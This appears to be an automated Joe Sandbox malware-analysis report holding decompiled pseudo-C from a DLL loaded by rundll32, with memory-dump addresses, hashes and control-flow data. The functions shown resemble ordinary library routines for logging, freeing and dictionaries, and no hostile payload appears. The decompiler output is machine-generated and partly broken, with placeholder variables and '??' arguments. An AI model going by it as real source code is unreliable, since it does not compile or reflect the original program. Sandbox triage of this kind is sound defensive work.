                                                      				intOrPtr* _t109;
                                                      				void* _t110;
                                                      				intOrPtr* _t111;
                                                      
                                                      				_t107 = __eax;
                                                      				_t111 = _t110 - 0x2c;
                                                      				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                      					_t96 = 0;
                                                      					do {
                                                      						_t90 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 8)) + _t96 * 4));
                                                      						_t96 = _t96 + 1;
                                                      						 *_t111 = _t90;
                                                      						L100265B0();
                                                      					} while (_t96 <  *((intOrPtr*)(__eax + 0xc)));
                                                      				}
                                                      				_t106 =  *((intOrPtr*)(_t107 + 0x1c));
                                                      				if(_t106 != 0) {
                                                      					if( *((intOrPtr*)(_t106 + 0xc)) != 0) {
                                                      						_t95 = 0;
                                                      						do {
                                                      							_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t106 + 8)) + _t95 * 4));
                                                      							_t95 = _t95 + 1;
                                                      							 *_t111 = _t88;
                                                      							L100265B0();
                                                      						} while (_t95 <  *((intOrPtr*)(_t106 + 0xc)));
                                                      					}
                                                      					_t109 =  *((intOrPtr*)(_t106 + 0x1c));
                                                      					if(_t109 != 0) {
                                                      						if( *((intOrPtr*)(_t109 + 0xc)) != 0) {
                                                      							_t94 = 0;
                                                      							do {
                                                      								_t86 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 8)) + _t94 * 4));
                                                      								_t94 = _t94 + 1;
                                                      								 *_t111 = _t86;
                                                      								L100265B0();
                                                      							} while (_t94 <  *((intOrPtr*)(_t109 + 0xc)));
                                                      						}
                                                      						_t102 =  *((intOrPtr*)(_t109 + 0x1c));
                                                      						if(_t102 != 0) {
                                                      							if( *((intOrPtr*)(_t102 + 0xc)) != 0) {
                                                      								_t93 = 0;
                                                      								do {
                                                      									 *((intOrPtr*)(_t111 + 0x18)) = _t102;
                                                      									_t84 =  *((intOrPtr*)( *((intOrPtr*)(_t102 + 8)) + _t93 * 4));
                                                      									_t93 = _t93 + 1;
                                                      									 *_t111 = _t84;
                                                      									L100265B0();
                                                      									_t102 =  *((intOrPtr*)(_t111 + 0x18));
                                                      								} while (_t93 <  *((intOrPtr*)(_t102 + 0xc)));
                                                      							}
                                                      							_t98 =  *((intOrPtr*)(_t102 + 0x1c));
                                                      							if(_t98 != 0) {
                                                      								if( *((intOrPtr*)(_t98 + 0xc)) != 0) {
                                                      									_t92 = 0;
                                                      									do {
                                                      										 *((intOrPtr*)(_t111 + 0x1c)) = _t102;
                                                      										 *((intOrPtr*)(_t111 + 0x18)) = _t98;
                                                      										_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 8)) + _t92 * 4));
                                                      										_t92 = _t92 + 1;
                                                      										 *_t111 = _t82;
                                                      										L100265B0();
                                                      										_t98 =  *((intOrPtr*)(_t111 + 0x18));
                                                      										_t102 =  *((intOrPtr*)(_t111 + 0x1c));
                                                      									} while (_t92 <  *((intOrPtr*)(_t98 + 0xc)));
                                                      								}
                                                      								_t76 =  *((intOrPtr*)(_t98 + 0x1c));
                                                      								if( *((intOrPtr*)(_t98 + 0x1c)) != 0) {
                                                      									 *((intOrPtr*)(_t111 + 0x1c)) = _t98;
                                                      									 *((intOrPtr*)(_t111 + 0x18)) = _t102;
                                                      									E10012850(_t76);
                                                      									_t98 =  *((intOrPtr*)(_t111 + 0x1c));
                                                      									_t102 =  *((intOrPtr*)(_t111 + 0x18));
                                                      								}
                                                      								 *((intOrPtr*)(_t111 + 0x1c)) = _t102;
                                                      								 *((intOrPtr*)(_t111 + 0x18)) = _t98;
                                                      								 *_t111 =  *_t98;
                                                      								L100265B0();
                                                      								 *_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)) + 8));
                                                      								L100265B0();
                                                      								 *_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)) + 0x14));
                                                      								L100265B0();
                                                      								 *_t111 =  *((intOrPtr*)(_t111 + 0x18));
                                                      								L100265B0();
                                                      								_t102 =  *((intOrPtr*)(_t111 + 0x1c));
                                                      							}
                                                      							 *((intOrPtr*)(_t111 + 0x18)) = _t102;
                                                      							 *_t111 =  *_t102;
                                                      							L100265B0();
                                                      							 *_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)) + 8));
                                                      							L100265B0();
                                                      							 *_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)) + 0x14));
                                                      							L100265B0();
                                                      							 *_t111 =  *((intOrPtr*)(_t111 + 0x18));
                                                      							L100265B0();
                                                      						}
                                                      						 *_t111 =  *_t109;
                                                      						L100265B0();
                                                      						 *_t111 =  *((intOrPtr*)(_t109 + 8));
                                                      						L100265B0();
                                                      						 *_t111 =  *((intOrPtr*)(_t109 + 0x14));
                                                      						L100265B0();
                                                      						 *_t111 = _t109;
                                                      						L100265B0();
                                                      					}
                                                      					 *_t111 =  *_t106;
                                                      					L100265B0();
                                                      					 *_t111 =  *((intOrPtr*)(_t106 + 8));
                                                      					L100265B0();
                                                      					 *_t111 =  *((intOrPtr*)(_t106 + 0x14));
                                                      					L100265B0();
                                                      					 *_t111 = _t106;
                                                      					L100265B0();
                                                      				}
                                                      				 *_t111 =  *_t107;
                                                      				L100265B0();
                                                      				 *_t111 =  *((intOrPtr*)(_t107 + 8));
                                                      				L100265B0();
                                                      				_t65 =  *((intOrPtr*)(_t107 + 0x14));
                                                      				 *_t111 = _t65;
                                                      				L100265B0();
                                                      				 *_t111 = _t107;
                                                      				L100265B0();
                                                      				return _t65;
                                                      			}





















                                                      0x100129ee
                                                      0x100129f6
                                                      0x100129f9
                                                      0x10012a01
                                                      0x10012a04
                                                      0x10012a09
                                                      0x10012a0c
                                                      0x10012a0c
                                                      0x10012a13
                                                      0x10012a16
                                                      0x10012a1e
                                                      0x10012a21
                                                      0x10012a29
                                                      0x10012a2c
                                                      0x10012a31
                                                      0x10012a34
                                                      0x10012a34
                                                      0x10012a3b
                                                      0x10012a3e
                                                      0x10012a46
                                                      0x10012a49
                                                      0x10012a4e
                                                      0x10012a51
                                                      0x10012a54
                                                      0x10012a59
                                                      0x10012a5c
                                                      0x10012a68

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: de691f1ba13835e21657e86075408ec6b0dc09785dc25b7b1d0ef4953b892b6e
                                                      • Instruction ID: 2f248bfe3db45479d33083a71d7c86b86264631c37f86e05a0edac7835ee7c2e
                                                      • Opcode Fuzzy Hash: de691f1ba13835e21657e86075408ec6b0dc09785dc25b7b1d0ef4953b892b6e
                                                      • Instruction Fuzzy Hash: 2A6192B8A04B558FC704EF69D4C191AB7E0FF48254F51891CE9948B31AEB30F896CBD2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 714 100296d4 715 100296d8-100296fa mv_freep * 2 714->715 716 1002971e-1002972d mv_freep * 2 715->716 717 100296fc-100296fe 715->717 719 10029732-10029738 716->719 718 10029702-10029712 717->718 718->715 720 10029714-1002971c 718->720 721 10029378-1002939b mv_log 719->721 722 10029738 719->722 720->716 720->718 723 100293d0-100293d5 721->723 724 1002939d-100293a3 721->724 722->721 725 1002973e-10029741 722->725 727 10029310-1002931a 723->727 728 100293db-100293de 723->728 724->723 726 100293a5-100293c4 call 10029240 724->726 725->721 729 10029747-1002974a 725->729 726->723 728->723 737 1002928e-10029297 728->737 732 10029798-1002979d 729->732 733 1002974c-10029750 729->733 735 10029762-10029784 mv_log 732->735 736 1002979f-100297a0 732->736 733->732 734 10029752-10029755 733->734 734->735 738 10029757-10029760 734->738 739 1002935a-10029373 mv_log 735->739 740 1002978a-1002978d 735->740 736->721 737->723 741 1002929d-100292a6 737->741 738->732 738->735 739->721 742 100297e6-100297f9 740->742 743 100299d5-100299e3 call 10028940 740->743 744 100299e8-10029a3b call 100290d0 mv_log mv_freep 740->744 745 100297a8-100297cd mv_log 740->745 746 10029a5e-10029a9c mv_d2q mv_log 740->746 747 100293e8-100293eb 741->747 748 100292ac-100292af 741->748 750 10029810-100298a0 mv_log 742->750 751 100297fb-10029809 742->751 743->739 744->739 745->739 746->739 747->723 752 100293ed-10029425 mv_log 747->752 748->723 754 100292b5-100292ca strcmp 748->754 750->739 751->750 754->723 756 100292d0-100292f6 mv_log 754->756 756->727 760 1002942a-100295ef mv_log * 2 756->760 760->719
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_freep$mv_log
                                                      • String ID: %-15s $ (default $"%s"$%d/%d$%lld
                                                      • API String ID: 2749705325-3616743394
                                                      • Opcode ID: 29b06a4c8fc90e14002c87a4c6f33f06bcf76f627d83655d7f8131f9e1fae942
                                                      • Instruction ID: a78736eaf865b939ee6902c1b70fed4f9ad85332988bb7fcaf3499c0514d5393
                                                      • Opcode Fuzzy Hash: 29b06a4c8fc90e14002c87a4c6f33f06bcf76f627d83655d7f8131f9e1fae942
                                                      • Instruction Fuzzy Hash: D191AF78A087459FC750DF28E48065EFBE1FF89780F91892EF8998B351E774E9418B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E10011210(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int _a4, signed int _a8, void* _a12, signed int _a16) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				void* _v32;
                                                      				void* _v36;
                                                      				int _v48;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _t94;
                                                      				signed int* _t95;
                                                      				signed int _t101;
                                                      				signed int _t102;
                                                      				signed int _t104;
                                                      				signed int _t106;
                                                      				int _t108;
                                                      				int _t109;
                                                      				int _t111;
                                                      				signed int* _t118;
                                                      				int _t122;
                                                      				signed int _t123;
                                                      				int _t126;
                                                      				signed int _t127;
                                                      				signed int* _t130;
                                                      				int _t133;
                                                      				signed int _t134;
                                                      				void _t136;
                                                      				signed int _t138;
                                                      				void* _t142;
                                                      				signed int _t146;
                                                      				void* _t147;
                                                      				signed int _t149;
                                                      				signed int _t150;
                                                      				int _t153;
                                                      				void* _t154;
                                                      				signed int* _t157;
                                                      				signed int* _t158;
                                                      
                                                      				_v8 = __edi;
                                                      				_v16 = __ebx;
                                                      				_t138 = _a16;
                                                      				_v12 = __esi;
                                                      				_t146 = _a8;
                                                      				_v4 = __ebp;
                                                      				_t118 =  *_a4;
                                                      				_v36 = 0;
                                                      				_v32 = 0;
                                                      				if((_t138 & 0x00000008) == 0) {
                                                      					if(_a12 == 0) {
                                                      						goto L2;
                                                      					}
                                                      					 *_t158 = _a12;
                                                      					_v32 = E100267C0(_t118, _t138, _t146, __ebp);
                                                      					if(_t146 != 0) {
                                                      						goto L3;
                                                      					}
                                                      					goto L22;
                                                      				} else {
                                                      					_v32 = _a12;
                                                      					L2:
                                                      					if(_t146 == 0) {
                                                      						L22:
                                                      						_t147 = 0xffffffea;
                                                      						L23:
                                                      						if(_t118 == 0) {
                                                      							L10:
                                                      							 *_t158 = _v36;
                                                      							L100265B0();
                                                      							 *_t158 = _v32;
                                                      							L100265B0();
                                                      							L11:
                                                      							return _t147;
                                                      						}
                                                      						L9:
                                                      						if( *_t118 == 0) {
                                                      							 *_t158 =  &(_t118[1]);
                                                      							E100265C0();
                                                      							 *_t158 = _a4;
                                                      							E100265C0();
                                                      						}
                                                      						goto L10;
                                                      					}
                                                      					L3:
                                                      					_t157 = 0;
                                                      					if((_t138 & 0x00000040) == 0) {
                                                      						_v64 = _t138;
                                                      						_v68 = 0;
                                                      						_v72 = _t146;
                                                      						 *_t158 = _t118;
                                                      						_t157 = E100110D0();
                                                      					}
                                                      					if((_t138 & 0x00000004) == 0) {
                                                      						 *_t158 = _t146;
                                                      						_t94 = E100267C0(_t118, _t138, _t146, _t157);
                                                      						_v36 = _t94;
                                                      						_t149 = _t94;
                                                      						if(_t118 == 0) {
                                                      							goto L29;
                                                      						}
                                                      						if(_t94 == 0) {
                                                      							goto L8;
                                                      						}
                                                      						goto L6;
                                                      					} else {
                                                      						_v36 = _t146;
                                                      						if(_t118 == 0) {
                                                      							L29:
                                                      							 *_t158 = 8;
                                                      							_t95 = E100265E0();
                                                      							_t149 = _v36;
                                                      							_t118 = _t95;
                                                      							 *_a4 = _t118;
                                                      							if(_t118 == 0 || _t149 == 0) {
                                                      								_t147 = 0xfffffff4;
                                                      								goto L23;
                                                      							} else {
                                                      								goto L6;
                                                      							}
                                                      						}
                                                      						L6:
                                                      						_t122 = _v32;
                                                      						if(_a12 == 0 || _t122 != 0) {
                                                      							if(_t157 == 0) {
                                                      								_t150 =  *_t118;
                                                      								if(_t122 == 0) {
                                                      									L37:
                                                      									if(_t150 == 0) {
                                                      										 *_t158 =  &(_t118[1]);
                                                      										E100265C0();
                                                      										 *_t158 = _a4;
                                                      										E100265C0();
                                                      									}
                                                      									_t147 = 0;
                                                      									 *_t158 =  &_v36;
                                                      									E100265C0();
                                                      									goto L11;
                                                      								}
                                                      								_v68 = 8;
                                                      								_v72 = _t150 + 1;
                                                      								 *_t158 = _t118[1];
                                                      								_t101 = E100264F0();
                                                      								_t123 = _t101;
                                                      								if(_t101 == 0) {
                                                      									goto L8;
                                                      								}
                                                      								_t118[1] = _t101;
                                                      								_t150 =  *_t118;
                                                      								L18:
                                                      								_t102 = _v32;
                                                      								if(_t102 == 0) {
                                                      									goto L37;
                                                      								}
                                                      								_t130 = _t123 + _t150 * 8;
                                                      								_t130[1] = _t102;
                                                      								 *_t130 = _v36;
                                                      								 *_t118 = _t150 + 1;
                                                      								_t147 = 0;
                                                      								goto L11;
                                                      							}
                                                      							if((_t138 & 0x00000010) != 0) {
                                                      								 *_t158 = _t149;
                                                      								_t147 = 0;
                                                      								L100265B0();
                                                      								 *_t158 = _v32;
                                                      								L100265B0();
                                                      								goto L11;
                                                      							}
                                                      							_t104 = _a4;
                                                      							if(_t122 == 0 || (_t138 & 0x00000020) == 0) {
                                                      								 *_t158 = _t104;
                                                      								L100265B0();
                                                      								goto L17;
                                                      							} else {
                                                      								 *_t158 = _t104;
                                                      								_v48 = _t122;
                                                      								_t108 = strlen(??);
                                                      								 *_t158 = _v48;
                                                      								_t153 = _t108;
                                                      								_t109 = strlen(??);
                                                      								 *_t158 = _t104;
                                                      								_v48 = _t109;
                                                      								_t63 = _t109 + 1; // 0x1
                                                      								_v72 = _t153 + _t63;
                                                      								_t111 = E10026280();
                                                      								if(_t111 == 0) {
                                                      									goto L8;
                                                      								}
                                                      								_t133 = _v48;
                                                      								_t142 = _t111 + _t153;
                                                      								_t154 = _v32;
                                                      								_t126 = _t133 + 1;
                                                      								if(_t126 >= 8) {
                                                      									if((_t142 & 0x00000001) != 0) {
                                                      										_t127 =  *_t154 & 0x000000ff;
                                                      										_t142 = _t142 + 1;
                                                      										_t154 = _t154 + 1;
                                                      										 *(_t142 - 1) = _t127;
                                                      										_t126 = _t133;
                                                      									}
                                                      									if((_t142 & 0x00000002) != 0) {
                                                      										_t134 =  *_t154 & 0x0000ffff;
                                                      										_t142 = _t142 + 2;
                                                      										_t154 = _t154 + 2;
                                                      										_t126 = _t126 - 2;
                                                      										 *(_t142 - 2) = _t134;
                                                      									}
                                                      									if((_t142 & 0x00000004) != 0) {
                                                      										_t136 =  *_t154;
                                                      										_t142 = _t142 + 4;
                                                      										_t154 = _t154 + 4;
                                                      										_t126 = _t126 - 4;
                                                      										 *(_t142 - 4) = _t136;
                                                      									}
                                                      								}
                                                      								_v48 = _t111;
                                                      								memcpy(_t142, _t154, _t126);
                                                      								_t158 =  &(_t158[3]);
                                                      								 *_t158 =  &_v32;
                                                      								E100265C0();
                                                      								_v32 = _v48;
                                                      								L17:
                                                      								 *_t158 =  *_t157;
                                                      								L100265B0();
                                                      								_t106 =  *_t118;
                                                      								_t123 = _t118[1];
                                                      								_t31 = _t106 - 1; // -1
                                                      								_t150 = _t31;
                                                      								 *_t118 = _t150;
                                                      								 *_t157 =  *(_t123 + _t150 * 8);
                                                      								_a4 =  *(_t123 + 4 + _t150 * 8);
                                                      								goto L18;
                                                      							}
                                                      						} else {
                                                      							L8:
                                                      							_t147 = 0xfffffff4;
                                                      							goto L9;
                                                      						}
                                                      					}
                                                      				}
                                                      			}

                                                      0x10011273
                                                      0x10011273
                                                      0x10011279
                                                      0x100113c0
                                                      0x100113c0
                                                      0x100113c7
                                                      0x100113cc
                                                      0x100113d0
                                                      0x100113d8
                                                      0x100113da
                                                      0x100113e4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x100113da
                                                      0x1001127f
                                                      0x10011283
                                                      0x10011289
                                                      0x100112d2
                                                      0x10011432
                                                      0x10011434
                                                      0x10011468
                                                      0x1001146a
                                                      0x100114fb
                                                      0x100114fe
                                                      0x10011507
                                                      0x1001150a
                                                      0x1001150a
                                                      0x10011474
                                                      0x10011476
                                                      0x10011479
                                                      0x00000000
                                                      0x10011479
                                                      0x1001143c
                                                      0x10011440
                                                      0x10011447
                                                      0x1001144a
                                                      0x10011451
                                                      0x10011453
                                                      0x00000000
                                                      0x00000000
                                                      0x10011459
                                                      0x1001145c
                                                      0x1001131e
                                                      0x1001131e
                                                      0x10011324
                                                      0x00000000
                                                      0x00000000
                                                      0x1001132a
                                                      0x10011332
                                                      0x10011335
                                                      0x10011337
                                                      0x10011339
                                                      0x00000000
                                                      0x10011339
                                                      0x100112de
                                                      0x100113f0
                                                      0x100113f3
                                                      0x100113f5
                                                      0x100113fe
                                                      0x10011401
                                                      0x00000000
                                                      0x10011401
                                                      0x100112e6
                                                      0x100112e9
                                                      0x100112f4
                                                      0x100112f7
                                                      0x00000000
                                                      0x10011488
                                                      0x10011488
                                                      0x1001148d
                                                      0x10011491
                                                      0x1001149a
                                                      0x1001149d
                                                      0x1001149f
                                                      0x100114a4
                                                      0x100114a9
                                                      0x100114ad
                                                      0x100114b1
                                                      0x100114b5
                                                      0x100114bc
                                                      0x00000000
                                                      0x00000000
                                                      0x100114c2
                                                      0x100114c6
                                                      0x100114c9
                                                      0x100114cd
                                                      0x100114d3
                                                      0x1001151e
                                                      0x10011540
                                                      0x10011543
                                                      0x10011544
                                                      0x10011545
                                                      0x10011548
                                                      0x10011548
                                                      0x10011526
                                                      0x1001154c
                                                      0x1001154f
                                                      0x10011552
                                                      0x10011555
                                                      0x10011558
                                                      0x10011558
                                                      0x1001152e
                                                      0x10011530
                                                      0x10011532
                                                      0x10011535
                                                      0x10011538
                                                      0x1001153b
                                                      0x1001153b
                                                      0x1001152e
                                                      0x100114d5
                                                      0x100114dd
                                                      0x100114dd
                                                      0x100114df
                                                      0x100114e2
                                                      0x100114eb
                                                      0x100112fc
                                                      0x100112ff
                                                      0x10011302
                                                      0x10011307
                                                      0x10011309
                                                      0x1001130c
                                                      0x1001130c
                                                      0x1001130f
                                                      0x10011318
                                                      0x1001131b
                                                      0x00000000
                                                      0x1001131b
                                                      0x1001128f
                                                      0x1001128f
                                                      0x1001128f
                                                      0x00000000
                                                      0x1001128f
                                                      0x10011289
                                                      0x1001126d

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_strdup$mv_dict_getmv_mallocz
                                                      • String ID:
                                                      • API String ID: 3834523185-0
                                                      • Opcode ID: 34b8535691b7a7fadd794d32cbd0790fd03931f9f00ffb340a5a63087569dce7
                                                      • Instruction ID: 095bdf82c674aaefaf2cda3429f550f943fa4cc151a1ce18d08b383c11ff4614
                                                      • Opcode Fuzzy Hash: 34b8535691b7a7fadd794d32cbd0790fd03931f9f00ffb340a5a63087569dce7
                                                      • Instruction Fuzzy Hash: F39127B5A087518FC754DF68C48065EBBE1FF88794F12892DED989B344E770E981CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 35%
                                                      			E1001A6C0(void* __eax, void* __ecx, void* __edx, void* __eflags) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t251;
                                                      				signed int _t259;
                                                      				void* _t262;
                                                      				signed int* _t263;
                                                      				void* _t264;
                                                      				void* _t269;
                                                      				signed int _t275;
                                                      				void* _t278;
                                                      				signed int _t290;
                                                      				signed int _t291;
                                                      				void _t293;
                                                      				void* _t294;
                                                      				signed int _t307;
                                                      				signed int _t308;
                                                      				int _t311;
                                                      				signed int _t315;
                                                      				int _t321;
                                                      				void* _t323;
                                                      				int _t324;
                                                      				void* _t327;
                                                      				void* _t330;
                                                      				void* _t332;
                                                      				void* _t333;
                                                      				signed int _t335;
                                                      				void _t337;
                                                      				void* _t338;
                                                      				signed char* _t340;
                                                      				void* _t341;
                                                      				signed short* _t342;
                                                      				void _t343;
                                                      				signed int _t344;
                                                      				void* _t345;
                                                      				void* _t346;
                                                      				void** _t347;
                                                      
                                                      				_t345 = __eax;
                                                      				_t347 = _t346 - 0x4c;
                                                      				_t347[8] = __ecx;
                                                      				 *((intOrPtr*)(__eax + 0x54)) =  *((intOrPtr*)(__edx + 0x54));
                                                      				 *((intOrPtr*)(__eax + 0x5c)) =  *((intOrPtr*)(__edx + 0x5c));
                                                      				 *((intOrPtr*)(__eax + 0x60)) =  *((intOrPtr*)(__edx + 0x60));
                                                      				 *((intOrPtr*)(__eax + 0x58)) =  *((intOrPtr*)(__edx + 0x58));
                                                      				 *((intOrPtr*)(__eax + 0x130)) =  *((intOrPtr*)(__edx + 0x130));
                                                      				 *((intOrPtr*)(__eax + 0x134)) =  *((intOrPtr*)(__edx + 0x134));
                                                      				 *((intOrPtr*)(__eax + 0x138)) =  *((intOrPtr*)(__edx + 0x138));
                                                      				 *((intOrPtr*)(__eax + 0x68)) =  *((intOrPtr*)(__edx + 0x68));
                                                      				 *((intOrPtr*)(__eax + 0x6c)) =  *((intOrPtr*)(__edx + 0x6c));
                                                      				 *((intOrPtr*)(__eax + 0x13c)) =  *((intOrPtr*)(__edx + 0x13c));
                                                      				 *((intOrPtr*)(__eax + 0x170)) =  *((intOrPtr*)(__edx + 0x170));
                                                      				 *((intOrPtr*)(__eax + 0x174)) =  *((intOrPtr*)(__edx + 0x174));
                                                      				 *((intOrPtr*)(__eax + 0x90)) =  *((intOrPtr*)(__edx + 0x90));
                                                      				 *((intOrPtr*)(__eax + 0x94)) =  *((intOrPtr*)(__edx + 0x94));
                                                      				 *((intOrPtr*)(__eax + 0x98)) =  *((intOrPtr*)(__edx + 0x98));
                                                      				 *((intOrPtr*)(__eax + 0x9c)) =  *((intOrPtr*)(__edx + 0x9c));
                                                      				 *((intOrPtr*)(__eax + 0xa8)) =  *((intOrPtr*)(__edx + 0xa8));
                                                      				 *((intOrPtr*)(__eax + 0x70)) =  *((intOrPtr*)(__edx + 0x70));
                                                      				 *((intOrPtr*)(__eax + 0x74)) =  *((intOrPtr*)(__edx + 0x74));
                                                      				 *((intOrPtr*)(__eax + 0x8c)) =  *((intOrPtr*)(__edx + 0x8c));
                                                      				 *((intOrPtr*)(__eax + 0x108)) =  *((intOrPtr*)(__edx + 0x108));
                                                      				 *((intOrPtr*)(__eax + 0x10c)) =  *((intOrPtr*)(__edx + 0x10c));
                                                      				 *((intOrPtr*)(__eax + 0x124)) =  *((intOrPtr*)(__edx + 0x124));
                                                      				 *((intOrPtr*)(__eax + 0x110)) =  *((intOrPtr*)(__edx + 0x110));
                                                      				 *((intOrPtr*)(__eax + 0x114)) =  *((intOrPtr*)(__edx + 0x114));
                                                      				 *((intOrPtr*)(__eax + 0x78)) =  *((intOrPtr*)(__edx + 0x78));
                                                      				 *((intOrPtr*)(__eax + 0x7c)) =  *((intOrPtr*)(__edx + 0x7c));
                                                      				 *((intOrPtr*)(__eax + 0xa0)) =  *((intOrPtr*)(__edx + 0xa0));
                                                      				 *((intOrPtr*)(__eax + 0xa4)) =  *((intOrPtr*)(__edx + 0xa4));
                                                      				_t347[6] = __edx;
                                                      				_t304 =  *(__edx + 0x100);
                                                      				_t289 =  *(__edx + 0x104);
                                                      				 *((intOrPtr*)(__eax + 0x88)) =  *((intOrPtr*)(__edx + 0x88));
                                                      				 *(__eax + 0x100) =  *(__edx + 0x100);
                                                      				 *(__eax + 0x104) =  *(__edx + 0x104);
                                                      				 *((intOrPtr*)(__eax + 0x80)) =  *((intOrPtr*)(__edx + 0x80));
                                                      				 *((intOrPtr*)(__eax + 0x84)) =  *((intOrPtr*)(__edx + 0x84));
                                                      				 *((intOrPtr*)(__eax + 0xe8)) =  *((intOrPtr*)(__edx + 0xe8));
                                                      				 *((intOrPtr*)(__eax + 0x11c)) =  *((intOrPtr*)(__edx + 0x11c));
                                                      				 *((intOrPtr*)(__eax + 0xf0)) =  *((intOrPtr*)(__edx + 0xf0));
                                                      				 *((intOrPtr*)(__eax + 0xf4)) =  *((intOrPtr*)(__edx + 0xf4));
                                                      				 *((intOrPtr*)(__eax + 0xf8)) =  *((intOrPtr*)(__edx + 0xf8));
                                                      				 *((intOrPtr*)(__eax + 0xec)) =  *((intOrPtr*)(__edx + 0xec));
                                                      				 *((intOrPtr*)(__eax + 0xfc)) =  *((intOrPtr*)(__edx + 0xfc));
                                                      				_t347[2] = 0;
                                                      				_t347[1] =  *(__edx + 0x118);
                                                      				 *_t347 = __eax + 0x118;
                                                      				L10011D20();
                                                      				_t321 = _t347[6];
                                                      				if( *((intOrPtr*)(_t321 + 0xe4)) <= 0) {
                                                      					L31:
                                                      					_t347[6] = _t321;
                                                      					_t347[1] =  *(_t321 + 0x12c);
                                                      					 *_t347 = _t345 + 0x12c;
                                                      					_t290 = E1000A480(_t289, _t326, _t334, _t345);
                                                      					_t347[1] =  *(_t347[6] + 0x140);
                                                      					 *_t347 = _t345 + 0x140;
                                                      					return E1000A480(_t290, _t326, _t334, _t345) | _t290;
                                                      				} else {
                                                      					_t347[6] = 0;
                                                      					do {
                                                      						_t334 = _t347[6];
                                                      						_t289 =  *( *((intOrPtr*)(_t321 + 0xe0)) + _t347[6] * 4);
                                                      						_t326 =  *_t289;
                                                      						if(_t326 != 0 ||  *((intOrPtr*)(_t321 + 0x44)) ==  *((intOrPtr*)(_t345 + 0x44)) &&  *((intOrPtr*)(_t321 + 0x48)) ==  *((intOrPtr*)(_t345 + 0x48))) {
                                                      							if(_t347[8] != 0) {
                                                      								_t347[0xa] = _t321;
                                                      								 *_t347 =  *(_t289 + 8);
                                                      								_t251 = L10009DC0(_t289, _t304, _t326, _t334);
